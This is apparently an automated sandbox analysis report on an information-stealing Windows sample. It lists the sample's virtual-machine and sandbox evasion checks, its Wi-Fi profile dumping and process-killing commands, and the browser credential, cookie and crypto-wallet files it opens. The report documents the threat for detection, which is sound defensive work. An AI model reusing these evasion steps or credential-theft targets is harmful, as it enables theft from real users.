                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_PointingDevice
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT EstimatedChargeRemaining, BatteryStatus FROM Win32_Battery
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Model, Size FROM Win32_DiskDrive
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Description, MACAddress, IPEnabled FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = TRUE
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, Speed FROM Win32_NetworkAdapter WHERE MACAddress IS NOT NULL
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Default FROM Win32_Printer
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DeviceID, FileSystem, FreeSpace, Size FROM Win32_LogicalDisk WHERE DriveType = 3
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_SoundDevice
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Memory allocated: CF0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Memory allocated: 2A30000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Memory allocated: 2860000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 596812
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 596703
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 596594
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Window / User API: threadDelayed 3967
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Window / User API: threadDelayed 5837
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -20291418481080494s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -100000s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -99890s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -99781s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -99670s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -99562s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -99453s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -99343s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -99234s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -99125s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -99016s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -98905s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -98791s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -98686s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -98391s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -98239s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -98121s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -98016s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -97906s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -97797s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -97687s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -97578s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -97468s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -97359s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -97250s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -97140s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -97031s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -96921s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -596812s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -596703s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe TID: 7344 Thread sleep time: -596594s >= -30000s
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Product, Manufacturer, SerialNumber FROM Win32_BaseBoard
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer, SMBIOSBIOSVersion, ReleaseDate FROM Win32_BIOS
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 100000
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 99890
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 99781
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 99670
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 99562
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 99453
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 99343
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 99234
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 99125
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 99016
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 98905
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 98791
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 98686
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 98391
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 98239
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 98121
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 98016
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 97906
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 97797
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 97687
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 97578
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 97468
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 97359
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 97250
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 97140
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 97031
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 96921
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 596812
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 596703
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe Thread delayed: delay time: 596594
                        Source: Amcache.hve.19.dr Binary or memory string: VMware
                        Source: zyEDYRU0jw.exe Binary or memory string: Hyper-V
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: global block list test formVMware20,11696428655
                        Source: Amcache.hve.19.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: zyEDYRU0jw.exe Binary or memory string: virtualqemu
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                        Source: Amcache.hve.19.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                        Source: Amcache.hve.19.dr Binary or memory string: vmci.sys
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
                        Source: zyEDYRU0jw.exe Binary or memory string: IsVirtualMachine
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                        Source: Amcache.hve.19.dr Binary or memory string: VMware20,1
                        Source: Amcache.hve.19.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.19.dr Binary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.19.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                        Source: Amcache.hve.19.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.19.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.19.dr Binary or memory string: VMware PCI VMCI Bus Device
                        Source: Amcache.hve.19.dr Binary or memory string: VMware VMCI Bus Device
                        Source: Amcache.hve.19.dr Binary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.19.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
                        Source: zyEDYRU0jw.exe Binary or memory string: <IsVirtualMachine>b__1_0
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                        Source: Amcache.hve.19.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                        Source: Amcache.hve.19.dr Binary or memory string: VMware Virtual USB Mouse
                        Source: Amcache.hve.19.dr Binary or memory string: vmci.syshbin
                        Source: Amcache.hve.19.dr Binary or memory string: VMware, Inc.
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: discord.comVMware20,11696428655f
                        Source: Amcache.hve.19.dr Binary or memory string: VMware20,1hbin@
                        Source: Amcache.hve.19.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: Amcache.hve.19.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                        Source: Amcache.hve.19.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                        Source: Amcache.hve.19.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                        Source: Amcache.hve.19.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2249779842.0000000000E81000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
                        Source: Amcache.hve.19.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                        Source: Amcache.hve.19.dr Binary or memory string: vmci.syshbin`
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                        Source: Amcache.hve.19.dr Binary or memory string: \driver\vmci,\driver\pci
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
                        Source: Amcache.hve.19.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                        Source: Amcache.hve.19.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: tmpB110.tmp.dat.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

Source: zyEDYRU0jw.exe, ImportHider.cs | Reference to suspicious API methods: LoadLibrary(dllName)
Source: zyEDYRU0jw.exe, ImportHider.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(intPtr, methodName), typeof(T))
Source: zyEDYRU0jw.exe, Killer.cs | Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 1352
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 1352
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Queries volume information: C:\Users\user\Desktop\zyEDYRU0jw.exe VolumeInformation
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: Amcache.hve.19.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.19.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.19.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: zyEDYRU0jw.exe, 00000000.00000002.2257027503.0000000005B96000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: zyEDYRU0jw.exe, 00000000.00000002.2257027503.0000000005B96000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.19.dr | Binary or memory string: MsMpEng.exe
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                        Stealing of Sensitive Information

Source: Yara match | File source: zyEDYRU0jw.exe, type: SAMPLE
Source: Yara match | File source: 0.0.zyEDYRU0jw.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: zyEDYRU0jw.exe PID: 1352, type: MEMORYSTR
Source: Yara match | File source: zyEDYRU0jw.exe, type: SAMPLE
Source: Yara match | File source: 0.0.zyEDYRU0jw.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: zyEDYRU0jw.exe PID: 1352, type: MEMORYSTR
Source: zyEDYRU0jw.exe, 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: Electrum#\Electrum\wallets
Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Microsoft Jaxx Liberty
Source: zyEDYRU0jw.exe, 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: Exodus+\Exodus\exodus.wallet
Source: zyEDYRU0jw.exe, 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: Ethereum%\Ethereum\keystore
Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Microsoft ExodusWeb3 Wallet
Source: zyEDYRU0jw.exe, 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: Ethereum%\Ethereum\keystore
Source: zyEDYRU0jw.exe, 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
Source: zyEDYRU0jw.exe, 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: Ethereum%\Ethereum\keystore
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: zyEDYRU0jw.exe, type: SAMPLE
Source: Yara match | File source: 0.0.zyEDYRU0jw.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2250498152.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: zyEDYRU0jw.exe PID: 1352, type: MEMORYSTR

                        Remote Access Functionality

Source: Yara match | File source: zyEDYRU0jw.exe, type: SAMPLE
Source: Yara match | File source: 0.0.zyEDYRU0jw.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: zyEDYRU0jw.exe PID: 1352, type: MEMORYSTR
Source: Yara match | File source: zyEDYRU0jw.exe, type: SAMPLE
Source: Yara match | File source: 0.0.zyEDYRU0jw.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: zyEDYRU0jw.exe PID: 1352, type: MEMORYSTR

ATT&CK tactics and techniques (one line per tactic column of the original matrix; leading numbers are the counts shown next to a technique in that matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 831 Windows Management Instrumentation; 1 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers
